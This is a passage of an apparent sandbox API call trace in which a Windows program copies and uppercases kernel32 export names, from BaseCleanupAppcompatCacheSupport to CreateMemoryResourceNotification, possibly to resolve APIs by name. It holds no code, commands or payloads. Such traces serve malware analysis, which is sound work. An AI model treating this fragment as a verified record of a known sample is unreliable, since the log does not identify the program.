lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0081.038] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0081.039] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0081.039] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0081.039] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0081.039] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0081.039] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0081.039] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0081.039] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0081.039] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0081.039] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0081.039] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0081.039] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0081.039] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0081.039] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0081.039] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0081.039] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0081.039] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0081.039] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0081.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0081.040] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0081.040] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0081.040] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0081.040] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0081.040] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0081.040] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0081.040] lstrlenA (lpString="BEEP") returned 4 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0081.040] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0081.040] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0081.040] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0081.040] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0081.040] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0081.040] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0081.040] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0081.040] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0081.040] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0081.040] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0081.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0081.040] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0081.041] lstrlenA (lpString="CANCELIO") returned 8 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0081.041] lstrlenA (lpString="CANCELIOEX") returned 10 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0081.041] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0081.041] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0081.041] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0081.041] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0081.041] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0081.041] lstrlenA (lpString="CHECKELEVATION") returned 14 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0081.041] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0081.041] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0081.041] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0081.041] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0081.041] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0081.041] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0081.041] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0081.041] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0081.041] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0081.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0081.041] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0081.042] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0081.042] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0081.042] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0081.042] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0081.042] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0081.042] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0081.042] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0081.042] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0081.042] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0081.042] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0081.042] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0081.042] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0081.042] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0081.042] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0081.042] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0081.042] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0081.042] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0081.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0081.042] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0081.043] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0081.043] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0081.043] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0081.043] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0081.043] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0081.043] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0081.043] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0081.043] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0081.043] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0081.043] lstrlenA (lpString="COPYCONTEXT") returned 11 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0081.043] lstrlenA (lpString="COPYFILEA") returned 9 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0081.043] lstrlenA (lpString="COPYFILEEXA") returned 11 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0081.043] lstrlenA (lpString="COPYFILEEXW") returned 11 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0081.043] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0081.043] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0081.043] lstrlenA (lpString="COPYFILEW") returned 9 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0081.043] lstrlenA (lpString="COPYLZFILE") returned 10 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0081.043] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0081.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0081.044] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0081.044] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0081.044] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0081.044] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0081.044] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0081.044] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0081.044] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0081.044] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0081.044] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0081.044] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0081.044] lstrlenA (lpString="CREATEEVENTA") returned 12 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0081.044] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0081.044] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0081.044] lstrlenA (lpString="CREATEEVENTW") returned 12 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0081.044] lstrlenA (lpString="CREATEFIBER") returned 11 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0081.044] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0081.044] lstrlenA (lpString="CREATEFILEA") returned 11 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0081.044] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0081.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0081.045] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0081.045] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0081.045] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0081.045] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0081.045] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0081.045] lstrlenA (lpString="CREATEFILEW") returned 11 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0081.045] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0081.045] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0081.045] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0081.045] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0081.045] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0081.045] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0081.045] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0081.045] lstrlenA (lpString="CREATEJOBSET") returned 12 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0081.045] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0081.045] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | 